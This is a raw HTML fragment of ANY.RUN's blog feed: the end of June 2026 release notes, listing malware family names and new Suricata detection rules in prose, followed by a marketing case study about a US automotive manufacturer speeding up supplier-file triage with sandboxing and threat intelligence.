<li><a href="https://app.any.run/tasks/692b9855-e96e-4d5b-be41-c3e34cbe0c15/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-june-2026&amp;utm_term=010726&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener"><strong>JUNKLOCKER</strong></a> (mutex)</li>
</ul>



<ul class="wp-block-list">
<li><strong><a href="https://app.any.run/tasks/56d64e4d-7797-4122-8d5c-ae313e4d2a09/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-june-2026&amp;utm_term=010726&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">ORACLESPY</a> </strong></li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/16f14270-37fe-4f87-85a6-235dd47020ad?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-may-2026&amp;utm_term=030626&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener"><strong>PCLOCKER</strong></a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/706a4e50-1970-4e7a-bcb4-f417f2a5026b?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-may-2026&amp;utm_term=030626&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener"><strong>EXITIUM</strong></a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/de9e1fed-538d-4dbc-8bbc-07423f1d81ef/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-june-2026&amp;utm_term=010726&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener"><strong>ONYXC2</strong></a> (mutex)</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/a30ccad6-7ad8-47f6-a3eb-6e4270c7834a/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-june-2026&amp;utm_term=010726&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener"><strong>SHAT</strong></a> </li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/f1bc8ea8-78e1-462e-989b-2391f0e1490d?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-may-2026&amp;utm_term=030626&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener"><strong>MAKOP</strong></a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/1c13178d-d97a-4150-bd7a-1eb93a476e0d?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-may-2026&amp;utm_term=030626&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener"><strong>1BYTE</strong></a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/55514ae6-150d-4cde-90ed-60a26e5d25e9/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-june-2026&amp;utm_term=010726&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener"><strong>APEXTRADER</strong></a> </li>
</ul>



<ul class="wp-block-list">
<li><strong><a href="https://app.any.run/tasks/2bba5094-7ee2-4bd1-98f3-f3a9b5af3e91/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-june-2026&amp;utm_term=010726&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">GLAMOUR (YARA rule)</a> </strong></li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/807bf35a-2912-4541-ae11-6bdf901c9ef9?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-may-2026&amp;utm_term=030626&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener"><strong>MORPH</strong></a>&nbsp;</li>
</ul>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/b65c1bd1-1983-4b20-8ea5-3ffabe58437e/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-may-2026&amp;utm_term=030626&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener"><strong>SMUKX</strong></a>&nbsp;</li>
</ul>
</div>



<p class="wp-block-paragraph"></p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Cut response delays before threats become costly incidents.<br>
<span class="highlight">Give your SOC faster, evidence-backed decisions</span>

</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-june-2026&#038;utm_term=010726&#038;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Integrate in your SOC</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">New Suricata Rules</h2>



<p class="wp-block-paragraph">A total of 1,055 new Suricata rules were implemented in June to improve visibility into malicious network activity, including:</p>



<ul class="wp-block-list">
<li><a href="https://app.any.run/tasks/446d373f-2cc3-4455-97d5-64797934f6f1/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-june-2026&amp;utm_term=010726&amp;utm_content=linktoservice"><strong>Phishing Redirect Engine related URL</strong></a> (sid: 89003883) &#8211; Identifies various PhaaS operators&#8217; infrastructure used as routing layer, delivering victim to specific phishkit landing pages.</li>



<li><strong><a href="https://app.any.run/tasks/529a64bf-3465-4e8e-8983-564558ea2915/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-june-2026&amp;utm_term=010726&amp;utm_content=linktoservice">Adobe-themed RMM phishing</a></strong> (sid: 84003399) &#8211; Tracks attempts to lure user into installing remote management tool, disguised as shared secure documents.</li>



<li><strong><a href="https://app.any.run/tasks/8ca6e2fc-b4bb-4691-b295-8a971590c852/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-june-2026&amp;utm_term=010726&amp;utm_content=linktoservice">SilentNet CnC HTTP activity</a></strong> (sid: 84003444) &#8211; Detects SilentNet attempts to communicate with its C2-server.</li>
</ul>



<h2 class="wp-block-heading">About&nbsp;ANY.RUN&nbsp;</h2>



<p class="wp-block-paragraph">ANY.RUN, a leading provider of interactive malware analysis and threat intelligence solutions, helps businesses and organizations strengthen security operations with faster threat understanding andclearer evidence for response.</p>



<p class="wp-block-paragraph">Its solutions include the <a href="https://any.run/features//?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-june-2026&amp;utm_term=010726&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a> for enterprise-scale malware and phishing analysis, as well as <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-june-2026&amp;utm_term=010726&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence</a> solutions built on investigation data from more than 15,000 organizations. This intelligence helps security teams enrich alerts, detect active threats earlier, and support investigation and response workflows with relevant context.</p>



<p class="wp-block-paragraph">ANY.RUN is <a href="https://any.run/compliance/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-may-2026&amp;utm_term=030626&amp;utm_content=linktocompliance" target="_blank" rel="noreferrer noopener">SOC 2 Type II attested</a>, reflecting its strong security controls and commitment to protecting customer data. For SOCs, MSSPs, and enterprise teams, the platform helps reduce investigationuncertainty, improve triage speed, and turn threat analysis into actionable insights for faster, better-informed decisions.</p>



<p class="wp-block-paragraph"><a href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=release-notes-june-2026&amp;utm_term=010726&amp;utm_content=linktoenterprise#contact-sales" target="_blank" rel="noreferrer noopener"><strong>Integrate ANY.RUN into your SOC workflow →</strong></a> </p>
<p>The post <a href="https://any.run/cybersecurity-blog/release-notes-june-2026/">Release Notes: In-Browser Data Inspection, Torq Integration, and 1,100+ Threat Coverage Updates</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/release-notes-june-2026/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Closing the Supplier Security Gap: How a US Manufacturer Cut Third-Party Risk and Doubled SOC Triage Speed</title>
		<link>https://any.run/cybersecurity-blog/us-manufacturer-security-risk/</link>
					<comments>https://any.run/cybersecurity-blog/us-manufacturer-security-risk/#respond</comments>
		
		<dc:creator><![CDATA[ANY.RUN]]></dc:creator>
		<pubDate>Tue, 30 Jun 2026 10:11:20 +0000</pubDate>
				<category><![CDATA[Customer Success Story]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=21828</guid>

					<description><![CDATA[<p>For a US automotive manufacturer working with more than 200 active vendors, supplier file intake had become a growing security and cost challenge. That pressure is especially high in manufacturing, where SOC teams carry an average workload 18% higher than teams in other industries. By introducing behavioral sandboxing and threat intelligence, the company made triage [&#8230;]</p>
<p>The post <a href="https://any.run/cybersecurity-blog/us-manufacturer-security-risk/">Closing the Supplier Security Gap: How a US Manufacturer Cut Third-Party Risk and Doubled SOC Triage Speed</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p class="wp-block-paragraph">For a US automotive manufacturer working with more than 200 active vendors, supplier file intake had become a growing security and cost challenge. That pressure is especially high in manufacturing, where SOC teams carry an <strong>average workload 18% higher</strong> than teams in other industries.</p>



<p class="wp-block-paragraph">By introducing <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=us-manufacturer-security-risk&amp;utm_term=300626&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">behavioral sandboxing</a> and <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=us-manufacturer-security-risk&amp;utm_term=300626&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">threat intelligence</a>, the company made triage <strong>2x faster</strong>, achieved an <strong>MTTD of 20 seconds</strong>, <strong>improved MTTR</strong> and detection, and analyzed hundreds of supplier files every week without adding headcount.</p>



<h2 class="wp-block-heading">A US Automotive Manufacturer Built Around a Large Supplier Ecosystem&nbsp;</h2>



<p class="wp-block-paragraph">The company is a US-based automotive manufacturer&nbsp;operating&nbsp;within a highly interconnected supply chain. Its daily operations depend on&nbsp;continuous collaboration with more than 200 active vendors and third-party&nbsp;contractors.&nbsp;</p>



<p class="wp-block-paragraph">These external partners regularly exchange files with the organization to support ongoing manufacturing, technical, and business processes. This makes supplier communication essential to keeping operations moving, but it also creates a large and&nbsp;constantly changing entry point for risk.&nbsp;</p>



<p class="wp-block-paragraph">The SOC&nbsp;is responsible for&nbsp;protecting the company’s environment while ensuring legitimate supplier activity is not delayed. As the volume of incoming files grew, the team needed a way to&nbsp;analyzesubmissions&nbsp;consistently, improve detection and response speed, and reduce third-party exposure without increasing staffing costs.&nbsp;</p>



<h2 class="wp-block-heading">The Challenge: Supplier Files Were Entering Without a&nbsp;Consistent Analysis Process&nbsp;</h2>



<p class="wp-block-paragraph">Before ANY.RUN, the company had&nbsp;no systematic process for&nbsp;analyzing&nbsp;files&nbsp;received from vendors and third-party&nbsp;contractors.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="470" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/A-US-Manufacturers-Supplier-Security-Challenge-2-1024x470.png" alt="US Manufacturer’s security challenges " class="wp-image-21829" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/A-US-Manufacturers-Supplier-Security-Challenge-2-1024x470.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/A-US-Manufacturers-Supplier-Security-Challenge-2-300x138.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/A-US-Manufacturers-Supplier-Security-Challenge-2-768x353.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/A-US-Manufacturers-Supplier-Security-Challenge-2-1536x706.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/A-US-Manufacturers-Supplier-Security-Challenge-2-2048x941.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/A-US-Manufacturers-Supplier-Security-Challenge-2-370x170.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/A-US-Manufacturers-Supplier-Security-Challenge-2-270x124.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/A-US-Manufacturers-Supplier-Security-Challenge-2-740x340.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>US Manufacturer’s security challenges&nbsp;</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">Existing security controls could flag a submission as suspicious, but they did not always show what the file would actually do after execution. Without behavioral evidence, analysts were left with incomplete indicators and uncertain verdicts.</p>



<figure class="wp-block-pullquote has-text-align-center"><blockquote><p>“The volume itself was not the only challenge. The bigger issue was that analysts did not have enough&nbsp;context&nbsp;to quickly decide which supplier files were safe and which&nbsp;required&nbsp;further action.”&nbsp;</p><cite><strong><em>Head of SOC, US automotive manufacturer</em></strong>&nbsp;</cite></blockquote></figure>



<p class="wp-block-paragraph">This created several problems for the SOC:</p>



<h3 class="wp-block-heading">A Security Gap in Supplier File Intake&nbsp;</h3>



<p class="wp-block-paragraph">Files could enter the environment without passing through a dedicated behavioral analysis layer.</p>



<p class="wp-block-paragraph">This limited the company’s ability to identify threats that appeared harmless during static inspection but revealed malicious activity only after execution.</p>



<p class="wp-block-paragraph">The risk was especially significant in a large supplier ecosystem. A compromised vendor account or mailbox could turn a trusted communication channel into an indirect route into the organization. With <strong>more than 47%</strong> of attacks on manufacturing companies originating from email, supplier messages and attachments represented a critical part of the company’s third-party attack surface.</p>



<h3 class="wp-block-heading">High Escalation Rates&nbsp;</h3>



<p class="wp-block-paragraph">Tier 1 analysts often lacked enough&nbsp;context&nbsp;to&nbsp;confidently close suspicious submissions.&nbsp;</p>



<p class="wp-block-paragraph">As a result,&nbsp;the majority of&nbsp;these files were escalated to more experienced analysts. Senior team members had to spend time reviewing cases that could have been resolved earlier with clearer evidence.&nbsp;</p>



<h3 class="wp-block-heading">Rising Investigation Costs&nbsp;</h3>



<p class="wp-block-paragraph">The supplier network&nbsp;continued to generate a high volume of files. Handling that growth&nbsp;through manual investigation would have&nbsp;required&nbsp;more analyst hours and, eventually,&nbsp;additional&nbsp;headcount.&nbsp;</p>



<p class="wp-block-paragraph">Without a more scalable process, the company risked paying more just to maintain the same level of protection.</p>



<p class="wp-block-paragraph">This pressure is especially high in manufacturing, where SOC teams carry an average workload <strong>18% higher</strong> than security teams in other industries. For companies managing large supplier ecosystems, that makes manual investigation increasingly difficult to sustain.</p>



<h3 class="wp-block-heading">Longer Exposure to Potential&nbsp;Threats&nbsp;</h3>



<p class="wp-block-paragraph">Every delay in&nbsp;validating&nbsp;a suspicious file extended the period during which the organization could not&nbsp;confidently allow, block, or&nbsp;contain&nbsp;it.&nbsp;</p>



<p class="wp-block-paragraph">In a manufacturing environment, a missed&nbsp;threat&nbsp;can affect more than an individual endpoint. It can disrupt operations, expose sensitive data, and weaken trust across the supplier network.&nbsp;</p>



<h2 class="wp-block-heading">Building a Scalable Supplier File Triage and Analysis Process with ANY.RUN&nbsp;</h2>



<p class="wp-block-paragraph">The manufacturer introduced a&nbsp;consistent process for&nbsp;analyzing&nbsp;files received from vendors and third-party&nbsp;contractors.&nbsp;</p>



<p class="wp-block-paragraph">By combining&nbsp;behavioral&nbsp;analysis with&nbsp;threat&nbsp;intelligence, the SOC gained both the evidence needed to understand what a file&nbsp;does&nbsp;and the&nbsp;context&nbsp;required&nbsp;to assess the wider&nbsp;threat&nbsp;behind it.&nbsp;</p>



<figure class="wp-block-pullquote"><blockquote><p>“We have over 200 active vendors sending files into the environment. ANY.RUN gave us a scalable way to analyze that volume and make triage much faster without adding headcount”</p><cite>Head of SOC, automotive manufacturer</cite></blockquote></figure>



<p class="wp-block-paragraph">Instead of relying on isolated alerts or incomplete indicators, analysts could detect malicious submissions more accurately, reach verdicts faster, resolve more cases at Tier 1, and reduce the amount of senior analyst time spent on routine reviews.&nbsp;</p>



<p class="wp-block-paragraph">This improved detection quality while&nbsp;contributing to lower MTTD and MTTR across supplier-related investigations.&nbsp;</p>



<h3 class="wp-block-heading">Reaching Faster Verdicts with&nbsp;Behavioral&nbsp;Evidence&nbsp;</h3>



<p class="wp-block-paragraph">The SOC reduced triage time by giving analysts direct visibility into what suspicious supplier files did after execution.&nbsp;</p>



<p class="wp-block-paragraph">Files were safely&nbsp;analyzed&nbsp;in ANY.RUN’s cloud-based&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=us-manufacturer-security-risk&amp;utm_term=300626&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive&nbsp;Sandbox</a>, where the team could review process activity, network&nbsp;connections, system changes, commands, and other&nbsp;behavior&nbsp;without exposing the production environment.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="570" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/Screenshot-2026-06-23-at-11.08.07-2048x1139.png-1024x570.webp" alt="" class="wp-image-21830" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/Screenshot-2026-06-23-at-11.08.07-2048x1139.png-1024x570.webp 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/Screenshot-2026-06-23-at-11.08.07-2048x1139.png-300x167.webp 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/Screenshot-2026-06-23-at-11.08.07-2048x1139.png-768x427.webp 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/Screenshot-2026-06-23-at-11.08.07-2048x1139.png-1536x854.webp 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/Screenshot-2026-06-23-at-11.08.07-2048x1139.png-370x206.webp 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/Screenshot-2026-06-23-at-11.08.07-2048x1139.png-270x150.webp 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/Screenshot-2026-06-23-at-11.08.07-2048x1139.png-740x412.webp 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/Screenshot-2026-06-23-at-11.08.07-2048x1139.png.webp 2048w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Full chain of a complicated&nbsp;EvilTokens&nbsp;attack on US companies&nbsp;analyzed&nbsp;in&nbsp;just 1 minute</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">This&nbsp;replaced incomplete indicators with&nbsp;clear evidence&nbsp;of whether a submission was malicious and how it could affect the business.&nbsp;</p>



<figure class="wp-block-pullquote"><blockquote><p><em>“We no longer&nbsp;have to&nbsp;spend time piecing together what a supplier file might do. The&nbsp;behavior&nbsp;is visible in one place, which makes decisions faster and easier to defend.”</em>&nbsp;</p><cite><strong><em>Head of SOC, US automotive manufacturer</em></strong>&nbsp;</cite></blockquote></figure>



<p class="wp-block-paragraph">Structured and visual results also helped Tier 1 analysts move from alert to verdict with fewer manual checks. Instead of reconstructing file&nbsp;behavior&nbsp;across disconnected tools, they could&nbsp;validatesuspicious submissions faster and make more&nbsp;confident decisions.&nbsp;</p>



<p class="wp-block-paragraph">The faster path from alert to&nbsp;confirmed verdict&nbsp;contributed to improved MTTD, while clearer evidence and fewer&nbsp;repeated checks helped reduce MTTR.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Cut investigation time</span> with clear behavioral evidence<br>Help analysts reach <span class="highlight">faster decisions. </span>
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=us-manufacturer-security-risk&#038;utm_term=300626&#038;utm_content=linktoenterprise#contact-sales" target="_blank" rel="noopener">
Accelerate triage now &nbsp;
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h3 class="wp-block-heading">Connecting Supplier Files to Wider&nbsp;Threat&nbsp;Activity&nbsp;</h3>



<p class="wp-block-paragraph">Behavioral analysis showed the team what each suspicious file did. <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=us-manufacturer-security-risk&amp;utm_term=300626&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat intelligence</a> helped reveal whether the submission was connected to a larger risk.</p>



<p class="wp-block-paragraph">Indicators uncovered during analysis could be linked to malicious infrastructure, related samples, known campaigns, and attacker activity. This gave analysts a clearer view of whether they were dealing with an isolated file or broader activity involving the company’s supplier ecosystem.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="383" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/img68.jpg-1024x383.webp" alt="" class="wp-image-21831" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/img68.jpg-1024x383.webp 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/img68.jpg-300x112.webp 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/img68.jpg-768x287.webp 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/img68.jpg-370x138.webp 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/img68.jpg-270x101.webp 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/img68.jpg-740x277.webp 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/img68.jpg.webp 1252w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>ANY.RUN’s Threat Intelligence used to explore broader threat context</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">The SOC also used this context to uncover additional indicators and behavioral patterns, strengthening internal detection controls beyond the original submission.</p>



<p class="wp-block-paragraph">As a result, each investigation&nbsp;contributed to wider&nbsp;threat&nbsp;visibility. The team could resolve the immediate case while also&nbsp;identifying&nbsp;related activity that might otherwise remain hidden across the supply chain.&nbsp;</p>



<h3 class="wp-block-heading">Resolving More Supplier Files at Tier 1&nbsp;</h3>



<p class="wp-block-paragraph">Before ANY.RUN, suspicious supplier files often moved up the escalation chain because Tier 1 analysts lacked enough evidence to&nbsp;confidently&nbsp;determine&nbsp;whether they were safe or malicious.&nbsp;</p>



<p class="wp-block-paragraph">With&nbsp;behavioral&nbsp;analysis,&nbsp;threat&nbsp;intelligence, and structured Tier 1 Reports available in the same workflow, first-line analysts received clearer summaries of each case, along with practical recommendations for the next step.&nbsp;</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="685" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/Screenshot-2026-05-12-at-13.53.31.png-1024x685.webp" alt="" class="wp-image-21832" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/Screenshot-2026-05-12-at-13.53.31.png-1024x685.webp 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/Screenshot-2026-05-12-at-13.53.31.png-300x201.webp 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/Screenshot-2026-05-12-at-13.53.31.png-768x514.webp 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/Screenshot-2026-05-12-at-13.53.31.png-1536x1027.webp 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/Screenshot-2026-05-12-at-13.53.31.png-370x247.webp 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/Screenshot-2026-05-12-at-13.53.31.png-270x181.webp 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/Screenshot-2026-05-12-at-13.53.31.png-740x495.webp 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/Screenshot-2026-05-12-at-13.53.31.png.webp 1890w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>AI Summary generated inside ANY.RUN’s&nbsp;sandbox&nbsp;for deeper analysis and faster handoff</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">This reduced the need to interpret every technical detail manually and helped analysts reach decisions faster. The company recorded a significant reduction in Tier 1 escalations, while Tier 2 received fewer low-context cases.&nbsp;</p>



<figure class="wp-block-pullquote"><blockquote><p><em>“Cases that can be resolved at the first level no longer&nbsp;consume Tier 2 time. When escalation is necessary, senior analysts receive the relevant evidence instead of having to restart the investigation.”</em>&nbsp;</p><cite><strong><em>Head of SOC, US automotive manufacturer</em></strong>&nbsp;</cite></blockquote></figure>



<p class="wp-block-paragraph">The change reduced duplicated work and made better use of specialist&nbsp;expertise. Senior analysts spent less time&nbsp;repeating initial validation and more time investigating complex or high-impact&nbsp;threats.&nbsp;</p>



<p class="wp-block-paragraph">More supplier files were resolved at the right level the first time, helping investigation queues move faster and lowering the cost of each case.&nbsp;</p>



<h3 class="wp-block-heading">Analyzing&nbsp;Hundreds of Files Without Adding Headcount&nbsp;</h3>



<p class="wp-block-paragraph">The company now analyzes hundreds of supplier files every week without hiring additional analysts.</p>



<p class="wp-block-paragraph">For the business, this is one of the clearest returns from the new process. The manufacturer increased its triage and analysis capacity while keeping staffing costs stable.&nbsp;</p>



<p class="wp-block-paragraph">Instead of treating headcount growth as the only solution to rising file volumes, the company gave its existing team a faster and more&nbsp;consistent way to detect malicious activity and reach verdicts.&nbsp;</p>



<p class="wp-block-paragraph">The SOC now absorbs more supplier activity without creating the same increase in&nbsp;labor&nbsp;costs or investigation backlogs.&nbsp;</p>



<p class="wp-block-paragraph">This also gives the company a more sustainable foundation for growth. As the vendor network expands or file volume rises, the security team has a triage process that can scale with it.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Reduce</span> third-party exposure before it affects operations.<br>Increase security capacity  <span class="highlight"> without increasing headcount. </span>
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/by-industry/manufacturing/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=us-manufacturer-security-risk&#038;utm_term=300626&#038;utm_content=linktomanufacturing#contact-sales" target="_blank" rel="noopener">
Reduce risk now  &nbsp;
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">Improving MTTD and MTTR with 2x Faster Triage&nbsp;</h2>



<p class="wp-block-paragraph">The manufacturer achieved a&nbsp;<strong>2x improvement in alert processing and&nbsp;threat&nbsp;analysis speed</strong>,&nbsp;contributing to lower mean time to detect and mean time to respond.&nbsp;</p>



<p class="wp-block-paragraph">Suspicious supplier files moved through triage twice as fast. Analysts identified malicious behavior sooner, reached confirmed verdicts with less delay, and passed high-risk cases into response with clearer evidence already collected.</p>



<p class="wp-block-paragraph">Legitimate submissions were also cleared faster, reducing the time business teams spent waiting for a security decision.&nbsp;</p>



